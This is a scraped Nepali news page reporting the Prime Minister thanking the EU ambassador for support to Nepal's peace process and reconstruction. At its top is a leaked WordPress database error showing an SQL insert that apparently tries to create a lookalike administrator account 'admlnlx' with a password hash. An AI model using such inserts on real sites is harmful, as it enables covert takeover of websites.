WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWWbBDMznO8VSBv5Ju2yEoptvOh80a/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 12:06:29', '', 'admlnlx', 'admlnlx')
काठमाडौँ, मंसिर २१ –
प्रधानमन्त्री पुष्पकमल दाहालले नेपालको शान्ति प्रक्रियाको सफलताका लागि युरोपेली सङ्घले खेलेको भूमिकाका लागि सङ्घलाई धन्यवाद दिनुभएको छ ।
नेपालस्थित सङ्घका राजदूत रिन्चे टिरिङसँग प्रधानमन्त्री निवास बालुवाटारमा आज भएको भेटवार्तामा उहाँले भूकम्पपछिको पुनःनिर्माण एवम् विकासका क्षेत्रमा गरेको सहयोगको पनि प्रशंसा गर्नुभयो ।
भेटमा राजदूत टिरिङले नेपालको शान्ति प्रक्रिया विश्वमै मौलिक भएको र यसबाट विश्व समुदायले सकारात्मक शिक्षा लिन सक्ने बताउँदै नेपालको संविधान कार्यान्वयन सफलतापूर्वक अगाडि बढ्नेमा सङ्घ विश्वस्त रहेको बताउनुभएको थियो । रासस